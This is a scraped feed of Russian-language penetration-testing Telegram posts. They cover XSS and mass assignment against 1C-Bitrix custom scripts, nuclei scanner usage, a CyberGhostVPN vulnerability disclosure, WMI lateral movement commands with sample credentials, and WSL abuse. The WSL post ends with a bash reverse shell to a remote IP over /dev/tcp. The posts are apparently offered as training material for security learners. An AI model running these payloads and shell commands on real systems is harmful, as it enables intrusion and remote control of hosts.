Forwarded from Что-то на пентестерском
Атаки на 1с-битрикс | Часть 2 | Атака🤓
⛈ Атака на самописы
Когда вы обнаружили список самописных скриптов и определились какие query string параметры они принимают, можно протестировать на ряд уязвимостей в зависимости от функционала скрипта
К примеру, если это подписка на рассылку, значит он будет ожидать email адрес, оттуда и можно построить вектор атаки и потестировать к примеру на XSS таким пэйлоадом:
🟢 Атака Mass Assignment
Программные фреймворки или скрипты иногда позволяют разработчикам автоматически привязывать параметры HTTP-запроса к переменным кода программы или объектам, чтобы упростить использование этого фреймворка или скрипта. Иногда это может причинить вред
Мы можем использовать эту методологию для добавления новых параметров, которые разработчик не предполагал, что, в свою очередь, создает или перезаписывает объекты в программном коде
Это называется Mass Assignment
Таким образом мы можем поискать скрытые параметры и потестить их на любые уязвимости
Список утилит для поиска скрытых параметров:
➡️ X8
➡️ ParamSpider
➡️ Arjun
➡️ ParamMiner
ЧТНП | #web #исследования
Когда вы обнаружили список самописных скриптов и определились какие query string параметры они принимают, можно протестировать на ряд уязвимостей в зависимости от функционала скрипта
К примеру, если это подписка на рассылку, значит он будет ожидать email адрес, оттуда и можно построить вектор атаки и потестировать к примеру на XSS таким пэйлоадом:
mail(<script>alert(0)</script>)@gmail.com
Полный список трюков по email можно глянуть тут Программные фреймворки или скрипты иногда позволяют разработчикам автоматически привязывать параметры HTTP-запроса к переменным кода программы или объектам, чтобы упростить использование этого фреймворка или скрипта. Иногда это может причинить вред
Мы можем использовать эту методологию для добавления новых параметров, которые разработчик не предполагал, что, в свою очередь, создает или перезаписывает объекты в программном коде
Это называется Mass Assignment
Таким образом мы можем поискать скрытые параметры и потестить их на любые уязвимости
Список утилит для поиска скрытых параметров:
ЧТНП | #web #исследования
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
nuclei & nuclei templates
Я думаю многие из нас знают такой великолепный инструмент, как nuclei. Для тех кто все еще не знаком, проведу краткий ликбез:
nuclei - opensource инструмент автоматизации пентеста. Который написан на go, что обеспечило ему неплохую производительность даже на крупном скоупе. Сканирование происходит по template'ам. Эти шаблоны может написать любой юзер. Синтаксис шаблонов достаточно прост для проверки и эксплуатации комплексных CVE.
Установка:
#tools
Я думаю многие из нас знают такой великолепный инструмент, как nuclei. Для тех кто все еще не знаком, проведу краткий ликбез:
nuclei - opensource инструмент автоматизации пентеста. Который написан на go, что обеспечило ему неплохую производительность даже на крупном скоупе. Сканирование происходит по template'ам. Эти шаблоны может написать любой юзер. Синтаксис шаблонов достаточно прост для проверки и эксплуатации комплексных CVE.
Установка:
sudo apt install -y nucleiИспользование:
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
brew install nuclei
nuclei -h
Вывести список всех загруженных шаблоновnuclei -tl
Базовое использованиеnuclei -t название_шаблона -l scope.txt
nuclei -t cves -u example.com
Классический список шаблонов выглядит следующим образом. Но ведь не обязательно использовать только эти популярный шаблоны) Поэтому я нашел для вас репозиторий, где собраны самые интересные репозитории с шаблонами для nuclei. #tools
🔥7
Forwarded from Private Shizo
This media is not supported in your browser
VIEW IN TELEGRAM
💥CyberGhostVPN - the story of finding MITM, RCE, LPE in the Linux client
This article discloses the vulnerabilities that were present in the CyberGhostVPN Linux 1.3.5 client (and versions below). The latest version of the CyberGhostVPN Linux client is now free from these vulnerabilities.
This article discloses the vulnerabilities that were present in the CyberGhostVPN Linux 1.3.5 client (and versions below). The latest version of the CyberGhostVPN Linux client is now free from these vulnerabilities.
Всем эффективного дня! Помню, что у меня на канале много интернов и джунов. Ребят, про вас никто не забыл)
Что вам интересно почитать из обучающего контента?
#пообсуждаем
Что вам интересно почитать из обучающего контента?
#пообсуждаем
cyber-security.pdf
235.9 KB
Cyber Security Expert
Step by step guide to becoming a Cyber Security Expert in 2023
#попросьбампросящих
Step by step guide to becoming a Cyber Security Expert in 2023
#попросьбампросящих
❤6
❤3🔥1
Forwarded from CyberSecrets
Боковое перемещение: WMI
Windows Management Interface (WMI) одна из самых старых технологий управления Windows. Для взаимодействия использует RPC на 135 порту и требует привилегии локального администратора.
WMI позволяет запускать процессы на удаленном хосте. Можно воспользоваться утилитой
Или использовать cmdlet
Встроенные в Windows средства не позволяют получить интерактивную оболочку и удобнее использовать другие механизмы RDP и PSRemoting или воспользоваться сторонними утилитами, которые предоставляют интерактивный режим, например, wmiexec, invoke-wmiexec, wmishell и другие.
С моей точки зрения WMI не самый удобный механизм для бокового перемещения, но это отличный инструмент для сбора информации на удаленном хосте. Например, аналог команды netstat будет следующим:
#Внутрянка #RedTeam #PurpleTeam
Windows Management Interface (WMI) одна из самых старых технологий управления Windows. Для взаимодействия использует RPC на 135 порту и требует привилегии локального администратора.
WMI позволяет запускать процессы на удаленном хосте. Можно воспользоваться утилитой
wmic. И хотя Microsoft сообщало, что утилита будет удалена из операционной системы она еще встречается.wmic /node:comp.domain.local /user:domain\user /password:Qwerty123 process call create "C:\Windows\System32\calc.exe"
Или использовать cmdlet
Get-WmiObject$process = Get-WmiObject -query "SELECT * FROM Meta_Class WHERE __Class = 'Win32_Process'" -namespace "root\cimv2" -computername comp1
$results = $process.Create( "calc.exe" )
Встроенные в Windows средства не позволяют получить интерактивную оболочку и удобнее использовать другие механизмы RDP и PSRemoting или воспользоваться сторонними утилитами, которые предоставляют интерактивный режим, например, wmiexec, invoke-wmiexec, wmishell и другие.
С моей точки зрения WMI не самый удобный механизм для бокового перемещения, но это отличный инструмент для сбора информации на удаленном хосте. Например, аналог команды netstat будет следующим:
Get-WmiObject -Namespace ROOT\StandardCIMV2 -Class MSFT_NetTCPConnection -ComputerName comp| Select-Object LocalAddress, RemoteAddress, RemotePort, State
#Внутрянка #RedTeam #PurpleTeam
🔥3
Forwarded from Monkey Hacker
Abuse WSL
#RU
И естественно благодаря данной функции мы можем выполнить различные хитрости, которые нам недоступны как обычному пользователю, но можем выполнить в пределах нашего шелла. Нужны самые стандартные права пользователя, но важно, чтобы мы смогли выполнить
Потом убеждаемся, что данный функционал действительно работает и смотрим, доступен ли нам какой-либо дистрибутив
#EN
And of course with this feature we can do all sorts of tricks which we can't do as a normal user but we can do within our shell. We need the most standard user rights, but it is important that we can run
Then we make sure that this feature really works and check if any
#RU
Если все ок, то проверьте, что у вас есть еще доступ к
#EN
If everything is ok, check that you have access to the bash shell (
Начинаем с базового | Starting with basic
OR
Если ответ видим
#RU
P.S если что то это не тот же самый root, который есть в виндовой тачке, однако мы можем выполнять теперь те действия, которые изначально нам не были доступны
#EN
P.S it is not the same as root, which is in the wind machine, but we can now do things that were not originally available to us
#RU
Мы можем выполнять/модифицировать различные бинари на основной машине
#EN
We can run/modify different binary on the main machine
Have fun👀
#RU
Windows Subsystem for Linux (WSL) - по факту данная функция в Windows, дает доступ к компактной версии файловой системе Linux, т.е мы можем выполнять практически любые команды Linux в Windows.И естественно благодаря данной функции мы можем выполнить различные хитрости, которые нам недоступны как обычному пользователю, но можем выполнить в пределах нашего шелла. Нужны самые стандартные права пользователя, но важно, чтобы мы смогли выполнить
wsl --install для включения данного функционала.Потом убеждаемся, что данный функционал действительно работает и смотрим, доступен ли нам какой-либо дистрибутив
Linux (по стандарту там будет Ubuntu)#EN
Windows Subsystem for Linux (WSL) - in fact this function in Windows, gives us access to a compact version of the Linux file system, i.e. we can execute almost any Linux command in Windows.And of course with this feature we can do all sorts of tricks which we can't do as a normal user but we can do within our shell. We need the most standard user rights, but it is important that we can run
wsl --install to enable this feature.Then we make sure that this feature really works and check if any
Linux distro is available for us (by default this would be Ubuntu)wsl --list --running#RU
Если все ок, то проверьте, что у вас есть еще доступ к
bash оболочке (bash.exe). Обычно он имеет путь следующий:C:\Windows\system32\bash.exe#EN
If everything is ok, check that you have access to the bash shell (
bash.exe). It usually has the path as follows:C:\Windows\system32\bash.exeНачинаем с базового | Starting with basic
wsl.exe "whoami"OR
bash.exe -c "whoami"Если ответ видим
root, то можно попробовать rev-shell | If the answer is root, you can try rev-shellbash.exe -c "bash -i >& /dev/tcp/10.10.10.128/5555 0>&1"#RU
P.S если что то это не тот же самый root, который есть в виндовой тачке, однако мы можем выполнять теперь те действия, которые изначально нам не были доступны
#EN
P.S it is not the same as root, which is in the wind machine, but we can now do things that were not originally available to us
#RU
Мы можем выполнять/модифицировать различные бинари на основной машине
#EN
We can run/modify different binary on the main machine
wsl.exe -e /mnt/c/Windows/System32/NeTrojan.exeHave fun
Please open Telegram to view this post
VIEW IN TELEGRAM